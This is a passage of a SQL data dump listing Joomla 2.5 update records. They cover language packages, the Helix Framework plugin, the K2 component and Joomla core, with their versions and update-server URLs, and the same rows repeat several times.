0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2108,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2109,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2110,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2111,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2112,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2113,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2114,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2115,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2116,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2117,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2118,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2119,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2120,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2121,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2122,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2123,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2124,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2125,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2126,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2127,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2128,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2129,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2130,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2131,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2132,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2133,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2134,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2135,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2136,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2137,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2138,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2139,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2140,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2141,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2142,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2143,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2144,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2145,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2146,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2147,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2148,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2149,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2150,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2151,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2152,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2153,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2154,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2155,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2156,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2157,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2158,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2159,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2160,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2161,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2162,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2163,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2164,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2165,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2166,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2167,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2168,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2169,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2170,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2171,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2172,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2173,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2174,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2175,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2176,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2177,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2178,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2179,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2180,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2181,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2182,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2183,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2184,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2185,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2186,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2187,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2188,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2189,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2190,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2191,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2192,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2193,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2194,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2195,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2196,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2197,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2198,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2199,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2200,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2201,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2202,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2203,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2204,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2205,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2206,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2207,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2208,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2209,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2210,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2211,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2212,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2213,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2214,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2215,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2216,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2217,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2218,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2219,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2220,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2221,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2222,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2223,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2224,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2225,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2226,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2227,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2228,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2229,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2230,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2231,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2232,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2233,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2234,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2235,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2236,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2237,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2238,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2239,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2240,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2241,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2242,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2243,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2244,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2245,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2246,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2247,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2248,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2249,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2250,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2251,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2252,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2253,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2254,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2255,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2256,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2257,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2258,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2259,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2260,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2261,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2262,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2263,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2264,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2265,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2266,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2267,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2268,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2269,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2270,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2271,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2272,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2273,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2274,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2275,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2276,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2277,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2278,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2279,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2280,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2281,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2282,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2283,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2284,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2285,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2286,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2287,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2288,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2289,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2290,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2291,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2292,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2293,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2294,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2295,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2296,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2297,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2298,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2299,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2300,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2301,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2302,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2303,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2304,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2305,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2306,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2307,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2308,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2309,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2310,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2311,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2312,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2313,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2314,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2315,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2316,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2317,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2318,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2319,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2320,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2321,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2322,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2323,3,0,0,'Tamil 